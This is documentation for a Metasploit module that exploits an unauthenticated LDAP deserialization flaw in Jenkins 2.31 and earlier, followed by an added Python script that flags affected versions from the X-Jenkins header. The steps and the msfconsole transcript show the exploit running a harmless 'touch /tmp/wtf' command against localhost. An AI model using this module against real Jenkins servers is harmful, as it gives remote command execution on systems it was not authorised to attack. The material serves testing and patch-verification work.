## Vulnerable Application

Jenkins 2.31 or below is vulnerable and can be downloaded from [updates.jenkins-ci.org](https://updates.jenkins-ci.org/download/war/2.31/jenkins.war).

This vulnerability does not require authentication; only HTTP access to the vulnerable application is required.

## Verification Steps

1. Download [jenkins 2.31](https://updates.jenkins-ci.org/download/war/2.31/jenkins.war)
2. Install jenkins: `java -jar jenkins.war`
3. Start `msfconsole`
4. Do: `use exploit/linux/misc/jenkins_ldap_deserialize`
5. Do: `set RHOST [target host]`
6. Do: `set PAYLOAD cmd/unix/generic`
7. Do: `set CMD 'touch /tmp/wtf'`
8. Do: `run`
9. It should create /tmp/wtf on the target host.

## Required Options

**RHOST**

The address of the jenkins server.

## Options

**RPORT**

The http port for the jenkins server. (Defaults to 8080)

**TARGETURI**

The path to the target instance of Jenkins. (Defaults to /)

**SRVHOST**

The local address to listen for the LDAP request on. (Defaults to 127.0.0.1)

**SRVPORT**

The local port to listen for the LDAP request on. (Defaults to 1389)

**LDAPHOST**

The ldap host the exploit will connect to. Can be different from `SRVHOST` if in an environment where there is port forwarding. (Defaults to 127.0.0.1)

## Scenarios

Example usage against a unix target running Jenkins 2.31.

```
msf > use exploit/linux/misc/jenkins_ldap_deserialize
msf exploit(jenkins_ldap_deserialize) > set TARGETURI /
TARGETURI => /
msf exploit(jenkins_ldap_deserialize) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf exploit(jenkins_ldap_deserialize) > set RPORT 8080
RPORT => 8080
msf exploit(jenkins_ldap_deserialize) > set PAYLOAD cmd/unix/generic
PAYLOAD => cmd/unix/generic
msf exploit(jenkins_ldap_deserialize) > set CMD 'touch /tmp/wtf'
CMD => touch /tmp/wtf
msf exploit(jenkins_ldap_deserialize) > run
[*] Exploit completed, but no session was created.
```
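The page states that Jenkins 2.31 or below is affected and that the exploit only needs HTTP reachability. The following is an added inventory check, not part of the Metasploit module or of Jenkins: it reads the version Jenkins advertises in its `X-Jenkins` response header and reports whether an instance falls in the affected range, so a defender can find unpatched servers before they are reachable over HTTP. The sample responses at the bottom are constructed; `fetch_headers` and the choice to treat any `2.31.x` as affected are assumptions made here.

```python
"""Added example: flag Jenkins instances whose advertised version is <= 2.31.

Jenkins includes an ``X-Jenkins: <version>`` header on its HTTP responses.
This script parses that header and compares it against the affected range
named on this page. It is not part of the Metasploit module.
"""
import re
import urllib.error
import urllib.request
from typing import Mapping, Optional, Tuple

# Highest (major, minor) this page marks as vulnerable.
VULNERABLE_MAX = (2, 31)


def parse_version(header: Optional[str]) -> Optional[Tuple[int, ...]]:
    """Turn an X-Jenkins value such as '2.31' or '2.19.4' into an int tuple."""
    m = re.match(r"^\s*(\d+(?:\.\d+)*)", header or "")
    if not m:
        return None
    return tuple(int(part) for part in m.group(1).split("."))


def is_vulnerable_version(header: Optional[str]) -> Optional[bool]:
    """True if major.minor <= 2.31, False if newer, None if unparseable.

    Assumption: only major.minor is compared, so a hypothetical 2.31.x would
    be treated as affected (conservative for an inventory sweep).
    """
    version = parse_version(header)
    if version is None:
        return None
    return version[:2] <= VULNERABLE_MAX


def jenkins_version_from_headers(headers: Mapping[str, str]) -> Optional[str]:
    """Find the X-Jenkins header case-insensitively; None if it is absent."""
    for name, value in headers.items():
        if name.lower() == "x-jenkins":
            return value
    return None


def triage(host: str, headers: Mapping[str, str]) -> str:
    """One-line verdict for a host given its response headers."""
    advertised = jenkins_version_from_headers(headers)
    if advertised is None:
        return f"{host}: no X-Jenkins header (not Jenkins, or header stripped)"
    verdict = is_vulnerable_version(advertised)
    if verdict is None:
        return f"{host}: unparseable X-Jenkins header {advertised!r}"
    if verdict:
        return f"{host}: Jenkins {advertised} -> in affected range (<= 2.31), upgrade"
    return f"{host}: Jenkins {advertised} -> not in affected range"


def fetch_headers(base_url: str, timeout: float = 5.0) -> Mapping[str, str]:
    """Fetch response headers for the Jenkins root URL (assumed reachable).

    A 403 from a locked-down instance still carries the X-Jenkins header,
    so HTTPError responses are used rather than discarded.
    """
    request = urllib.request.Request(base_url, method="HEAD")
    try:
        with urllib.request.urlopen(request, timeout=timeout) as response:
            return dict(response.headers.items())
    except urllib.error.HTTPError as err:
        return dict(err.headers.items())


# Constructed sample responses standing in for real scan output.
SAMPLE_RESPONSES = {
    "build01.example.internal:8080": {"Server": "Jetty(9.2.z)", "X-Jenkins": "2.31"},
    "build02.example.internal:8080": {"Server": "Jetty(9.2.z)", "x-jenkins": "2.19.4"},
    "build03.example.internal:8080": {"Server": "Jetty(9.4.z)", "X-Jenkins": "2.32"},
    "web01.example.internal:8080": {"Server": "nginx"},
}


def sweep(responses: Mapping[str, Mapping[str, str]]) -> list:
    """Triage every host in a host -> headers mapping."""
    return [triage(host, headers) for host, headers in responses.items()]


if __name__ == "__main__":
    for line in sweep(SAMPLE_RESPONSES):
        print(line)
```

Run it as-is to see the verdicts for the constructed sample; to use it against real hosts, replace `SAMPLE_RESPONSES` with `{host: fetch_headers(f"http://{host}/")}` for the instances you are responsible for. Because the exploit's `SRVHOST`/`SRVPORT` options describe an LDAP listener the Jenkins host connects back to, an upgrade plus an egress rule that denies outbound LDAP from build servers closes both the flaw and its trigger path.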